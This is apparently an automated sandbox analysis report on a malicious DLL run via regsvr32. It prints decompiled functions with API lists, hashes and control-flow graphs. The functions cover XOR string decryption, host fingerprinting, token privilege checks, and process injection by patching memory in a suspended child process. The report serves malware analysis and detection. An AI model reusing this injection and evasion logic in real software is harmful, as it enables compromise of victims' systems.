                • Part of subcall function 00738F63: memset.MSVCRT ref: 00738F75
              • Process32First.KERNEL32(00000000,?), ref: 0073BB44
              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0073BB84
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32memset
              • String ID:
              • API String ID: 3344077921-0
              • Opcode ID: 707fda3c821ec921b4845d07fbb07b2967ef1d44e31aa013a37796998028b02e
              • Instruction ID: 9b7f896e5f4b30e352686e5ce56106f1127f7c299b48f148e68abbf63bd1aef7
              • Opcode Fuzzy Hash: 707fda3c821ec921b4845d07fbb07b2967ef1d44e31aa013a37796998028b02e
              • Instruction Fuzzy Hash: 1211B6721042459BD310EF68EC49E6777ECFF85360F14062FF624CB195EB24D9048766
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073C778 Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 94%
              			E0073C778(WCHAR* __ecx, WCHAR* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				E00738F63(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x74f8d0; // 0xc2f8c0
				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
				lstrcpynW(__edx,  &_v528, 0x100);
				_t27 = E00739F85(_t44, 0x978);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E00738D9A( &_v16);
				_t33 = E0073A5E9(_t43);
				E00739FE4( &(_t43[E0073A5E9(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0073A5E9(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0073E34A(_t43, E0073A5E9(_t43) + _t40, 0);
			}
















              0x0073c778
              0x0073c781
              0x0073c78d
              0x0073c793
              0x0073c795
              0x0073c79d
              0x0073c7ab
              0x0073c7b0
              0x0073c7bf
              0x0073c7ca
              0x0073c7d7
              0x0073c7f1
              0x0073c7f6
              0x0073c7f8
              0x0073c7ff
              0x0073c80f
              0x0073c820
              0x0073c82a
              0x0073c832
              0x0073c839
              0x0073c83c
              0x0073c859

              APIs
                • Part of subcall function 00738F63: memset.MSVCRT ref: 00738F75
              • lstrcpynW.KERNEL32(?,?,00000100), ref: 0073C7BF
              • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0073C7F1
                • Part of subcall function 00739FE4: _vsnwprintf.MSVCRT ref: 0073A001
              • lstrcatW.KERNEL32(?,00000114), ref: 0073C82A
              • CharUpperBuffW.USER32(?,00000000), ref: 0073C83C
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
              • String ID:
              • API String ID: 455400327-0
              • Opcode ID: c07d1ffa96cb54610027f41df8ed5a78f6a0d547b4dcf915e8254867531a67d1
              • Instruction ID: a8fb4854b6b0d5762d4cf76e2c96a41782acc0f467e33662c19e418b9babedab
              • Opcode Fuzzy Hash: c07d1ffa96cb54610027f41df8ed5a78f6a0d547b4dcf915e8254867531a67d1
              • Instruction Fuzzy Hash: F02132B6A40214FFE710ABA4DC4EFEE77ACEB95310F104166F605D6182EB789E048B65
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00738BCD Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94stringCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 201 738bcd-738be2 202 738c05 201->202 203 738be4-738be7 201->203 205 738c0a-738c2a 202->205 204 738bee-738bfe 203->204 206 738c00-738c03 204->206 207 738c5d-738c5f 204->207 208 738c3a-738c3e 205->208 209 738c2c-738c31 205->209 206->202 206->204 207->202 210 738c61-738c65 call 738dc9 207->210 212 738c40-738c4a 208->212 213 738c4c-738c56 lstrlenW 208->213 209->209 211 738c33-738c38 209->211 216 738c6a-738c72 210->216 211->208 211->212 212->212 212->213 215 738c58-738c5c 213->215 217 738c74-738c79 216->217 218 738c7b-738c80 216->218 217->215 219 738c82-738c99 218->219 219->219 220 738c9b-738c9e 219->220 220->205
              C-Code - Quality: 80%
              			E00738BCD(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				short _v44;
				void* _t38;
				intOrPtr _t47;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t58;
				intOrPtr _t59;
				void* _t62;
				void* _t64;
				signed int _t71;
				signed int _t74;
				void* _t76;
				void* _t77;

				_t71 = _a12;
				_t53 = __edx;
				_v8 = __ecx;
				_t74 = _t71;
				if(_t71 >= __edx) {
					L4:
					_t54 = 0x74f94e;
					L5:
					_t58 = 0;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsw");
					asm("movsb");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_t38 = 0;
					if(_v28 == 0) {
						L8:
						_t64 = _t38;
						if(_t64 == 0) {
							L10:
							lstrlenW( &_v44);
							return _t54;
						} else {
							goto L9;
						}
						do {
							L9:
							_t19 = _t58 + 0x30; // 0x30
							 *((char*)(_t77 + _t58 - 0x28)) = _t19;
							_t58 = _t58 + 1;
						} while (_t58 < _t64);
						goto L10;
					} else {
						goto L6;
					}
					do {
						L6:
						_t38 = _t38 + 1;
					} while ( *((intOrPtr*)(_t77 + _t38 - 0x18)) != 0);
					_t64 = 0xe;
					if(_t38 > _t64) {
						goto L9;
					}
					goto L8;
				}
				_t59 = _a4;
				_a12 = 0x5a;
				while( *((intOrPtr*)(_t74 % _a12 + _t59)) !=  *((intOrPtr*)(_t74 + _v8))) {
					_t74 = _t74 + 1;
					if(_t74 < _t53) {
						continue;
					}
					goto L4;
				}
				_t76 = _t74 - _t71;
				if(_t76 == 0) {
					goto L4;
				}
				_t47 = E00738DC9(_t76 + 1); // executed
				_t55 = _t47;
				_v12 = _t55;
				if(_t55 != 0) {
					_t56 = _a4;
					_t62 = _t55 - _t71;
					do {
						 *(_t62 + _t71) =  *(_t71 % _a12 + _t56) ^  *(_t71 + _v8);
						_t71 = _t71 + 1;
						_t76 = _t76 - 1;
					} while (_t76 != 0);
					_t54 = _v12;
					goto L5;
				}
				return 0x74f94e;
			}





















              0x00738bd6
              0x00738bd9
              0x00738bdb
              0x00738bde
              0x00738be2
              0x00738c05
              0x00738c05
              0x00738c0a
              0x00738c14
              0x00738c16
              0x00738c17
              0x00738c18
              0x00738c19
              0x00738c1b
              0x00738c1f
              0x00738c20
              0x00738c21
              0x00738c22
              0x00738c24
              0x00738c25
              0x00738c2a
              0x00738c3a
              0x00738c3a
              0x00738c3e
              0x00738c4c
              0x00738c50
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00738c40
              0x00738c40
              0x00738c40
              0x00738c43
              0x00738c47
              0x00738c48
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00738c2c
              0x00738c2c
              0x00738c2c
              0x00738c2d
              0x00738c35
              0x00738c38
              0x00000000
              0x00000000
              0x00000000
              0x00738c38
              0x00738be4
              0x00738be7
              0x00738bee
              0x00738c00
              0x00738c03
              0x00000000
              0x00000000
              0x00000000
              0x00738c03
              0x00738c5d
              0x00738c5f
              0x00000000
              0x00000000
              0x00738c65
              0x00738c6a
              0x00738c6c
              0x00738c72
              0x00738c7d
              0x00738c80
              0x00738c82
              0x00738c92
              0x00738c95
              0x00738c96
              0x00738c96
              0x00738c9b
              0x00000000
              0x00738c9b
              0x00000000

              APIs
              • lstrlenW.KERNEL32(?,00000138,?,0074CA88), ref: 00738C50
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: lstrlen
              • String ID: GetCurrentPath$Z
              • API String ID: 1659193697-4005238709
              • Opcode ID: 2d5faf18988bd5707e9438e1ab20ebeeba69098bf0279d5ce36f37ff7193efe0
              • Instruction ID: 36b16101d4ce673879c5db61d7f353241084d69ca622cdef7289bab3309a800f
              • Opcode Fuzzy Hash: 2d5faf18988bd5707e9438e1ab20ebeeba69098bf0279d5ce36f37ff7193efe0
              • Instruction Fuzzy Hash: E8213670B017456FEB45CF69C4800AEBB66BB9D310F2804B8F941A7203DA34DC4687B1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073C986 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 234 73c986-73c9a6 GetTokenInformation 235 73c9a8-73c9b1 GetLastError 234->235 236 73c9ec 234->236 235->236 238 73c9b3-73c9c3 call 738dc9 235->238 237 73c9ee-73c9f2 236->237 241 73c9c5-73c9c7 238->241 242 73c9c9-73c9dc GetTokenInformation 238->242 241->237 242->236 243 73c9de-73c9ea call 738ddf 242->243 243->241
              C-Code - Quality: 86%
              			E0073C986(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E00738DC9(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E00738DDF( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










              0x0073c989
              0x0073c98a
              0x0073c991
              0x0073c999
              0x0073c99d
              0x0073c9a6
              0x0073c9ec
              0x0073c9ec
              0x0073c9b3
              0x0073c9bb
              0x0073c9bd
              0x0073c9c3
              0x0073c9dc
              0x00000000
              0x0073c9de
              0x0073c9e3
              0x00000000
              0x0073c9e9
              0x0073c9c5
              0x0073c9c5
              0x0073c9c5
              0x0073c9c5
              0x0073c9c3
              0x0073c9f2

              APIs
              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,00730000,00000000,00000000,?,0073CA07,00000000,00000000,?,0073CA30), ref: 0073C9A1
              • GetLastError.KERNEL32(?,0073CA07,00000000,00000000,?,0073CA30,00001644,?,0073E053), ref: 0073C9A8
                • Part of subcall function 00738DC9: RtlAllocateHeap.NTDLL(00000008,?,?,00739793,00000100,?,0073661B), ref: 00738DD7
              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,0073CA07,00000000,00000000,?,0073CA30,00001644,?,0073E053), ref: 0073C9D7
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: InformationToken$AllocateErrorHeapLast
              • String ID:
              • API String ID: 2499131667-0
              • Opcode ID: 5fc616cc1eb613622fb4c85cc983eb43d032fcc8cc55e7b3263956542ebde2f8
              • Instruction ID: c9c568ed6f337295e7bc2e4d98d6166f9d45644fc4f769acca69095353cb9afe
              • Opcode Fuzzy Hash: 5fc616cc1eb613622fb4c85cc983eb43d032fcc8cc55e7b3263956542ebde2f8
              • Instruction Fuzzy Hash: 46012636700214FFAB216BA5DC49E9B3FACDF597A0B110026F401E6112EB38ED0087A0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073CA5A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 246 73ca5a-73ca79 call 73c92f 249 73cb14-73cb17 246->249 250 73ca7f-73ca96 call 73c986 246->250 253 73caf6-73cb04 FindCloseChangeNotification 250->253 254 73ca98-73cab9 250->254 255 73cb12 253->255 256 73cb06-73cb11 call 738ddf 253->256 254->253 260 73cabb-73cabd 254->260 255->249 256->255 261 73cae9-73caf4 260->261 262 73cabf-73cac2 260->262 261->253 263 73cac5-73cad4 262->263 266 73cae6-73cae8 263->266 267 73cad6-73cae2 263->267 266->261 267->263 268 73cae4 267->268 268->261
              C-Code - Quality: 48%
              			E0073CA5A(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E0073C92F(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E0073C986(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							_t19 =  &_v20; // 0x73e075
							E00738DDF(_t19, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x74f8d8; // 0xc2fab0
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x74f8d8; // 0xc2fab0
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x74f8d8; // 0xc2fab0
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}




















              0x0073ca61
              0x0073ca63
              0x0073ca6a
              0x0073ca6c
              0x0073ca6f
              0x0073ca74
              0x0073ca79
              0x0073ca83
              0x0073ca86
              0x0073ca89
              0x0073ca8e
              0x0073ca90
              0x0073ca96
              0x0073caf6
              0x0073cafe
              0x0073cb04
              0x0073cb06
              0x0073cb0b
              0x0073cb11
              0x00000000
              0x0073cb12
              0x0073ca9b
              0x0073ca9c
              0x0073ca9d
              0x0073ca9e
              0x0073ca9f
              0x0073caa0
              0x0073caa1
              0x0073caa2
              0x0073caa7
              0x0073caa9
              0x0073caae
              0x0073caaf
              0x0073cab9
              0x00000000
              0x00000000
              0x0073cabd
              0x0073cae9
              0x0073cae9
              0x0073caf1
              0x0073caf4
              0x00000000
              0x0073caf4
              0x0073cabf
              0x0073cabf
              0x0073cac2
              0x0073cac5
              0x0073cac5
              0x0073cac8
              0x0073caca
              0x0073cad4
              0x00000000
              0x00000000
              0x0073cad9
              0x0073cada
              0x0073cadd
              0x0073cae2
              0x00000000
              0x00000000
              0x00000000
              0x0073cae4
              0x0073cae8
              0x00000000
              0x0073cae8
              0x0073cb17

              APIs
                • Part of subcall function 0073C92F: GetCurrentThread.KERNEL32 ref: 0073C942
                • Part of subcall function 0073C92F: OpenThreadToken.ADVAPI32(00000000,?,?,0073CA74,00000000,00730000), ref: 0073C949
                • Part of subcall function 0073C92F: GetLastError.KERNEL32(?,?,0073CA74,00000000,00730000), ref: 0073C950
                • Part of subcall function 0073C92F: OpenProcessToken.ADVAPI32(00000000,?,?,0073CA74,00000000,00730000), ref: 0073C975
                • Part of subcall function 0073C986: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,00730000,00000000,00000000,?,0073CA07,00000000,00000000,?,0073CA30), ref: 0073C9A1
                • Part of subcall function 0073C986: GetLastError.KERNEL32(?,0073CA07,00000000,00000000,?,0073CA30,00001644,?,0073E053), ref: 0073C9A8
              • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,00730000), ref: 0073CAFE
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
              • String ID: us
              • API String ID: 1806447117-795443346
              • Opcode ID: 0d28a9fba1f1b7fc45930ceec3429892633f87e576b4482103fdb4fa195cffbb
              • Instruction ID: 076ac3baec868d389245ec8b8c80f0d13dc59321347e21721d7af84ab10130e5
              • Opcode Fuzzy Hash: 0d28a9fba1f1b7fc45930ceec3429892633f87e576b4482103fdb4fa195cffbb
              • Instruction Fuzzy Hash: 3A215072A00209AFEB11DFA9DC85EAEB7F8EF48700F10806AE551FB152E7349D418B54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073BE10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40processCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 269 73be10-73be5f call 738f63 * 2 CreateProcessW
              C-Code - Quality: 79%
              			E0073BE10(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E00738F63(__edx, 0, 0x10);
				E00738F63( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}





              0x0073be21
              0x0073be2e
              0x0073be36
              0x0073be52
              0x0073be58
              0x0073be5f

              APIs
                • Part of subcall function 00738F63: memset.MSVCRT ref: 00738F75
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0073BE52
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: CreateProcessmemset
              • String ID: D
              • API String ID: 2296119082-2746444292
              • Opcode ID: c71214e4591e0bfc08dd22a044866697d497a16fb553f21185c8524e7c1ae155
              • Instruction ID: a52989227868d4b58a603fca76141f516c7bae0fbd3b511fa4bb7798e7ec6160
              • Opcode Fuzzy Hash: c71214e4591e0bfc08dd22a044866697d497a16fb553f21185c8524e7c1ae155
              • Instruction Fuzzy Hash: FAF030F16402087EF620E665DC0AFBF36ACDB81710F500125BA05EB1D1EAB4AD0582A5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073D889 Relevance: 3.1, APIs: 2, Instructions: 120COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 274 73d889-73d8a9 call 73d7cd 277 73d9da-73d9dd 274->277 278 73d8af-73d8ce call 73b6e3 274->278 281 73d8d4-73d8d6 278->281 282 73d9ca-73d9d9 call 738ddf 278->282 283 73d9b8-73d9c8 call 738ddf 281->283 284 73d8dc-73d8de 281->284 282->277 283->282 286 73d8e1-73d8e3 284->286 289 73d9a6-73d9b2 286->289 290 73d8e9-73d908 call 738f63 call 73be10 286->290 289->281 289->283 296 73d96a-73d96e 290->296 297 73d90a-73d91d call 73d9de 290->297 298 73d970-73d972 296->298 299 73d999-73d9a0 296->299 297->296 304 73d91f-73d937 297->304 301 73d983-73d993 298->301 302 73d974-73d97a 298->302 299->286 299->289 301->299 302->301 307 73d967 304->307 308 73d939-73d94e GetLastError call 73dadc 304->308 307->296 311 73d963-73d964 FindCloseChangeNotification 308->311 312 73d950-73d95b 308->312 311->307 314 73d95e 312->314 315 73d95d 312->315 314->311 315->314
              C-Code - Quality: 96%
              			E0073D889(intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				signed int _t45;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t59;
				void* _t62;
				intOrPtr _t63;
				signed int _t67;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t86;
				char _t87;
				void* _t88;

				_v16 = _v16 & 0x00000000;
				_v20 = __edx;
				_t86 = 0;
				_t37 = E0073D7CD( &_v16, __edx);
				_t87 = _t37;
				_v24 = _t87;
				_t89 = _t87;
				if(_t87 == 0) {
					return _t37;
				}
				_t38 =  *0x74f8d4; // 0xc2fc00
				_t7 = _t38 + 0xac; // 0xafbcc48
				E0073B6E3( &_v80,  *_t7 + 7, _t89);
				_v12 = _v12 & 0;
				_t67 = _v16;
				if(_t67 == 0) {
					L21:
					E00738DDF( &_v24, 0);
					return _t86;
				}
				while(_t86 == 0) {
					_t69 = 0;
					_v8 = 0;
					while(_t86 == 0) {
						E00738F63( &_v40, _t86, 0x10);
						_t88 = _t88 + 0xc;
						_t49 = E0073BE10( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
						_t94 = _t49;
						if(_t49 >= 0) {
							_t56 = E0073D9DE(E00736297,  &_v40, _t94, _v20); // executed
							if(_t56 != 0) {
								_t59 =  *0x74f8d0; // 0xc2f8c0
								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
								if(_t70 != 0) {
									GetLastError();
									_t62 = E0073DADC( &_v40);
									_t63 =  *0x74f8d0; // 0xc2f8c0
									if(_t62 != 0) {
										_push(0xea60);
										_push(_t70);
										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
											_t86 = _t86 + 1;
										}
										_t63 =  *0x74f8d0; // 0xc2f8c0
									}
									FindCloseChangeNotification(_t70);
								}
								_t69 = _v8;
							}
						}
						if(_v40 != 0) {
							if(_t86 == 0) {
								_t54 =  *0x74f8d0; // 0xc2f8c0
								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
							}
							_t50 =  *0x74f8d0; // 0xc2f8c0
							 *((intOrPtr*)(_t50 + 0x30))(_v36);
							_t52 =  *0x74f8d0; // 0xc2f8c0
							 *((intOrPtr*)(_t52 + 0x30))(_v40);
						}
						_t69 = _t69 + 1;
						_v8 = _t69;
						if(_t69 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t67 = _v16;
					_t45 = _v12 + 1;
					_v12 = _t45;
					if(_t45 < _t67) {
						continue;
					} else {
						break;
					}
					do {
						goto L20;
					} while (_t67 != 0);
					goto L21;
				}
				L20:
				E00738DDF(_t87, 0xfffffffe);
				_t87 = _t87 + 4;
				_t67 = _t67 - 1;
			}




























              0x0073d88f
              0x0073d898
              0x0073d89b
              0x0073d89d
              0x0073d8a2
              0x0073d8a4
              0x0073d8a7
              0x0073d8a9
              0x0073d9dd
              0x0073d9dd
              0x0073d8af
              0x0073d8b8
              0x0073d8c1
              0x0073d8c6
              0x0073d8c9
              0x0073d8ce
              0x0073d9ca
              0x0073d9d0
              0x00000000
              0x0073d9d9
              0x0073d8d4
              0x0073d8dc
              0x0073d8de
              0x0073d8e1
              0x0073d8f0
              0x0073d8fb
              0x0073d901
              0x0073d906
              0x0073d908
              0x0073d915
              0x0073d91d
              0x0073d928
              0x0073d933
              0x0073d937
              0x0073d939
              0x0073d942
              0x0073d949
              0x0073d94e
              0x0073d950
              0x0073d955
              0x0073d95b
              0x0073d95d
              0x0073d95d
              0x0073d95e
              0x0073d95e
              0x0073d964
              0x0073d964
              0x0073d967
              0x0073d967
              0x0073d91d
              0x0073d96e
              0x0073d972
              0x0073d974
              0x0073d97d
              0x0073d97d
              0x0073d983
              0x0073d98b
              0x0073d98e
              0x0073d996
              0x0073d996
              0x0073d999
              0x0073d99a
              0x0073d9a0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0073d9a0
              0x0073d9a9
              0x0073d9ac
              0x0073d9ad
              0x0073d9b2
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0073d9b8
              0x00000000
              0x00000000
              0x00000000
              0x0073d9b8
              0x0073d9b8
              0x0073d9bb
              0x0073d9c1
              0x0073d9c5

              APIs
                • Part of subcall function 00738F63: memset.MSVCRT ref: 00738F75
                • Part of subcall function 0073BE10: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0073BE52
                • Part of subcall function 0073D9DE: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0073DA40
                • Part of subcall function 0073D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0073DA89
                • Part of subcall function 0073D9DE: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0073DAA6
                • Part of subcall function 0073D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0073DAC7
              • GetLastError.KERNEL32(?,?,00000001), ref: 0073D939
                • Part of subcall function 0073DADC: ResumeThread.KERNELBASE(?,0073D947,?,?,00000001), ref: 0073DAE4
              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 0073D964
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
              • String ID:
              • API String ID: 2212882986-0
              • Opcode ID: e2081d1ab074184df09ae1815021b89875131d686b2d487580c2e720072420c2
              • Instruction ID: d5bf7d176a2f5065d55002226f943210d9ab35105f5e6b90538b46aa8b4ab6df
              • Opcode Fuzzy Hash: e2081d1ab074184df09ae1815021b89875131d686b2d487580c2e720072420c2
              • Instruction Fuzzy Hash: 34416576A00205EFEB20DFA5E989BDEB7F9FF48310F144065E515A7252DB38AD04CB60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00736603 Relevance: 3.1, APIs: 2, Instructions: 78threadCOMMON
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 61%
              			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
				long _v8;
				intOrPtr _t15;
				WCHAR* _t23;
				long _t24;
				void* _t28;
				void* _t31;
				intOrPtr _t36;
				void* _t41;
				void* _t48;
				intOrPtr* _t49;

				_push(__ecx);
				if(_a8 != 1) {
					__eflags = _a8;
					if(_a8 != 0) {
						L7:
						__eflags = 1;
						return 1;
					}
					_t15 =  *0x74f8d0; // 0xc2f8c0
					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
					L3:
					return 0;
				}
				E00738DB4();
				E00739787();
				 *0x74f8e8 = _a4;
				E00743D36(_a4);
				 *_t49 = 0xf2e;
				 *0x74f8d0 = E0073F0D9(0x74ca88, 0x138);
				 *_t49 = 0xe8d;
				_t23 = E00739F85(0x74ca88);
				_pop(_t41);
				_a8 = _t23;
				_t24 = GetFileAttributesW(_t23); // executed
				_push( &_a8);
				if(_t24 == 0xffffffff) {
					E00738D9A();
					 *_t49 = 0x1f4;
					_t28 = E0073FCDA(E0073109A(_t41));
					_a8 = _t28;
					__eflags = _t28;
					if(_t28 != 0) {
						_t48 = 0x54;
						 *0x74f8e0 = E0073F0D9(0x74cbf0, _t48);
						E0073647A(_t48, __eflags);
						E00738DDF( &_a8, 0xfffffffe);
						_t36 =  *0x74f8d0; // 0xc2f8c0
						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x641);
					}
					_v8 = 0;
					_t31 = CreateThread(0, 0, E007363A2, 0, 0,  &_v8);
					 *0x74f8f4 = _t31;
					__eflags = _t31;
					if(_t31 == 0) {
						goto L3;
					} else {
						goto L7;
					}
				}
				E00738D9A();
				goto L3;
			}













              0x00736606
              0x0073660b
              0x007366ef
              0x007366f3
              0x007366e8
              0x007366ea
              0x00000000
              0x007366ea
              0x007366f5
              0x007366ff
              0x0073666a
              0x00000000
              0x0073666a
              0x00736611
              0x00736616
              0x0073661f
              0x00736624
              0x0073662e
              0x0073663f
              0x00736644
              0x0073664b
              0x00736650
              0x00736652
